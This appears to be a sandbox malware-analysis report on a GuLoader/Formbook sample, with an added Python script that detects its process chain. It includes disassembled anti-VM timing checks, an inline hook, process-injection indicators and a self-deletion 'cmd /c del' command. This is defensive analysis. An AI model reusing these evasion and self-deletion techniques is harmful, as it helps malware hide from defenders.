      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BF900
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E482D07
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4825DD
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E2581
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3CD5E0
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_0056968F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05531D55
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05532D07
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05460D20
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055325DD
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547D5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05492581
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552D466
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547841F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0553DFCE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05531FF1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552D616
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05486E30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05532EF7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546F900
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05484120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521002
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0553E824
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548A830
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055328EC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547B090
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054920A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055320A8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548AB40
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05532B28
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552DBD2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055203DA
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549EBB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0551FA2B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055322AE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C3D069
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C21030
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C3DA97
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C22D8D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C22D90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C29E2B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C29E30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C22FB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C3DF79
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0546B150 appears 69 times
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: String function: 1E3BB150 appears 35 times
      Source: F63V4i8eZU.exeStatic PE information: invalid certificate
      Source: F63V4i8eZU.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: F63V4i8eZU.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: F63V4i8eZU.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: F63V4i8eZU.exe, 00000000.00000002.316213281.0000000000438000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISOL.exe vs F63V4i8eZU.exe
      Source: F63V4i8eZU.exe, 00000012.00000002.481559175.000000001E63F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs F63V4i8eZU.exe
      Source: F63V4i8eZU.exe, 00000012.00000002.476842708.00000000023E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs F63V4i8eZU.exe
      Source: F63V4i8eZU.exe, 00000012.00000002.476803523.0000000000AF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs F63V4i8eZU.exe
      Source: F63V4i8eZU.exe, 00000012.00000000.315529096.0000000000438000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISOL.exe vs F63V4i8eZU.exe
      Source: F63V4i8eZU.exe, 00000012.00000002.475313264.00000000000D6000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs F63V4i8eZU.exe
      Source: F63V4i8eZU.exeBinary or memory string: OriginalFilenameISOL.exe vs F63V4i8eZU.exe
      Source: F63V4i8eZU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000001F.00000002.1285459135.0000000004FC5000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001F.00000002.1287054375.000000000596F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@17/13
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_01
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeFile created: C:\Users\user\AppData\Local\Temp\~DFC9489ADE652B7AA1.TMP
      Source: F63V4i8eZU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: F63V4i8eZU.exeVirustotal: Detection: 10%
      Source: unknownProcess created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'
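The Process created lines form a short tree: the sample restarts itself, explorer.exe (whose own start is not in this list) launches a SysWOW64 chkdsk.exe with no arguments, and that chkdsk.exe runs cmd.exe /c del against the original sample path, so the dropper is removed by a process that never opened it. The script below is an added example, not part of this report or of the sandbox: it rebuilds the tree from lines in this format and flags both the argument-less system binary spawned by explorer.exe and the deletion of the sample by something other than the sample. The embedded lines are copied from above; the two detection rules are my own heuristics and will need tuning on real telemetry (chkdsk.exe is legitimately run by explorer.exe in some error-check dialogs, but with a volume argument).

```python
"""Rebuild the process tree from the report's "Process created" lines and
flag the self-deletion chain and the argument-less system binary started
by explorer.exe.

Added example, not part of the sandbox report. SAMPLE_LINES is copied
from the report; the two detection rules are my own heuristics.
"""
import re

LINE_RE = re.compile(r"Source:\s*(?P<parent>.+?)Process created:\s*(?P<child>\S+)\s*(?P<cmdline>.*)$")
DEL_RE = re.compile(r"/c\s+del\s+'?(?P<target>[^']+?)'?\s*$", re.IGNORECASE)
SYSTEM_DIRS = ("c:\\windows\\syswow64\\", "c:\\windows\\system32\\")

SAMPLE_PATH = r"C:\Users\user\Desktop\F63V4i8eZU.exe"

# Copied from the report; the duplicated lines are kept to show the de-duplication.
SAMPLE_LINES = (
    r"Source: unknownProcess created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'",
    r"Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe",
    r"Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'",
    r"Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'",
    r"Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'",
)


def parse_edges(lines):
    """Ordered, de-duplicated (parent image, child image, command line) triples."""
    edges, seen = [], set()
    for line in lines:
        m = LINE_RE.search(line)
        if m is None:
            continue
        edge = (m.group("parent"), m.group("child"), m.group("cmdline").strip())
        if edge not in seen:
            seen.add(edge)
            edges.append(edge)
    return edges


def parents_of(edges):
    """child image -> parent image; first edge wins and self-spawns are skipped."""
    parents = {}
    for parent, child, _ in edges:
        if parent.lower() != child.lower() and child not in parents:
            parents[child] = parent
    return parents


def lineage(edges, image):
    """Ancestor chain ending at image, oldest first; stops at 'unknown' or a cycle."""
    parents = parents_of(edges)
    chain, cur = [image], image
    while cur in parents and parents[cur] != "unknown" and parents[cur] not in chain:
        cur = parents[cur]
        chain.insert(0, cur)
    return chain


def self_delete_chains(edges, sample_path):
    """Lineages of cmd.exe instances that delete the sample on behalf of another process."""
    hits = []
    for parent, child, cmdline in edges:
        m = DEL_RE.search(cmdline)
        if (child.lower().endswith("cmd.exe") and m
                and m.group("target").lower() == sample_path.lower()
                and parent.lower() != sample_path.lower()):
            hits.append(lineage(edges, child))
    return hits


def argless_system_children(edges, parent_name="explorer.exe"):
    """System-directory binaries started by explorer.exe with no arguments at all."""
    hits = []
    for parent, child, cmdline in edges:
        if not parent.lower().endswith(parent_name):
            continue
        args = cmdline
        if args.lower().startswith(child.lower()):      # command line repeats the image path
            args = args[len(child):]
        args = args.strip().strip("\"'")
        if child.lower().startswith(SYSTEM_DIRS) and not args:
            hits.append(child)
    return hits


if __name__ == "__main__":
    edges = parse_edges(SAMPLE_LINES)
    for chain in self_delete_chains(edges, SAMPLE_PATH):
        print("sample deleted via:", " -> ".join(chain))
    for child in argless_system_children(edges):
        print("explorer.exe started", child, "without arguments")
```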
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
      Source: F63V4i8eZU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: chkdsk.pdbGCTL source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp
      Source: Binary string: chkdsk.pdb source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe
      Source: Binary string: wntdll.pdbUGP source: F63V4i8eZU.exe, 00000012.00000002.480375309.000000001E390000.00000040.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1285968735.0000000005440000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: F63V4i8eZU.exe, chkdsk.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.316460586.00000000022A0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_00406408 push es; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_00405D8C push es; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B1833 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B0218 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B4A13 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B3213 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B1A13 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B6214 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B5A03 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B4205 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B2A05 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B1205 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B4233 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B2A33 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B1233 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B5A33 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B5225 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B3A24 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B2224 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B0A24 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B6A24 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B0A58 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B5253 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B3A54 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B2254 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B6A54 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B0248 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B4A44 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B3244 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B1A44 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B6244 push edx; ret

      Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEC
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5852 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A08DC NtWriteVirtualMemory,TerminateProcess,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A045E EnumWindows,NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8DB4 NtWriteVirtualMemory,CreateProcessInternalW,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A423F NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4263 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4277 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5A46 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5A84
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2AFD
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2AD6
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A33A7 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A78B2
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A28E2 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4128 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A3920 LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A513E NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A46E4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7EFC LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A1FD9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2470 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A3C4D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7CA5 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7488 NtWriteVirtualMemory,
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A0182 second address: 00000000022A0182 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A6E61 second address: 00000000022A6E61 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A01B2 second address: 00000000022A01B2 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A78FC second address: 00000000022A790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A83B5 second address: 00000000022A83B5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], al 0x0000000c mov eax, dword ptr [ebp+0000025Ch] 0x00000012 jne 00007EFE34D2B3ABh 0x00000014 mov dword ptr [ebp+0000022Eh], esi 0x0000001a mov esi, AFB1434Bh 0x0000001f test bl, bl 0x00000021 cmp cl, bl 0x00000023 add esi, 0257D909h 0x00000029 add esi, 650EE949h 0x0000002f xor esi, 1718259Dh 0x00000035 clc 0x00000036 cmp ecx, esi 0x00000038 mov esi, dword ptr [ebp+0000022Eh] 0x0000003e jne 00007EFE34D2B117h 0x00000044 cmp bx, FDCDh 0x00000049 inc ecx 0x0000004a inc ebx 0x0000004b cmp ah, bh 0x0000004d mov dword ptr [ebp+0000018Bh], ecx 0x00000053 mov ecx, dword ptr [ebx] 0x00000055 cmp ecx, 9090C350h 0x0000005b mov ecx, dword ptr [ebp+0000018Bh] 0x00000061 jne 00007EFE34D2B3A6h 0x00000063 mov dword ptr [ebp+00000243h], ecx 0x00000069 mov ecx, edx 0x0000006b cmp ecx, dword ptr [ebx] 0x0000006d mov ecx, dword ptr [ebp+00000243h] 0x00000073 jne 00007EFE34D2B37Ah 0x00000075 mov byte ptr [ebp+000001FBh], cl 0x0000007b test ebx, ebx 0x0000007d mov cl, byte ptr [ebx] 0x0000007f cmp cl, FFFFFFE8h 0x00000082 mov cl, byte ptr [ebp+000001FBh] 0x00000088 jne 00007EFE34D2B467h 0x0000008e mov dword ptr [ebp+0000025Ch], eax 0x00000094 mov eax, 4C6E8F3Eh 0x00000099 sub eax, 0007D298h 0x0000009e xor eax, B23D3242h 0x000000a3 add eax, 01A471D4h 0x000000a8 pushad 0x000000a9 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000566C24 second address: 0000000000566C24 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000565B7B second address: 0000000000565BB6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c test eax, eax 0x0000000e je 00007EFE34D2B700h 0x00000014 pushad 0x00000015 mov dl, 95h 0x00000017 cmp dl, FFFFFF95h 0x0000001a jne 00007EFE34D2EAEFh 0x00000020 popad 0x00000021 mov dword ptr [ebp+000000E8h], eax 0x00000027 fnop 0x00000029 test bh, ch 0x0000002b mov eax, ebp 0x0000002d add eax, 00000100h 0x00000032 test ecx, edx 0x00000034 mov dword ptr [eax], 4FD2ADFDh 0x0000003a pushad 0x0000003b rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000565BB6 second address: 0000000000565BED instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c add dword ptr [eax], B8DD5D9Fh 0x00000012 pushad 0x00000013 mov dl, 11h 0x00000015 cmp dl, 00000011h 0x00000018 jne 00007EFE34BE0586h 0x0000001e popad 0x0000001f sub dword ptr [eax], 2B06605Eh 0x00000025 xor dword ptr [eax], DDA9ACEEh 0x0000002b fnop 0x0000002d test bh, ch 0x0000002f push 8402AFE5h 0x00000034 test ecx, edx 0x00000036 pushad 0x00000037 rdtsc
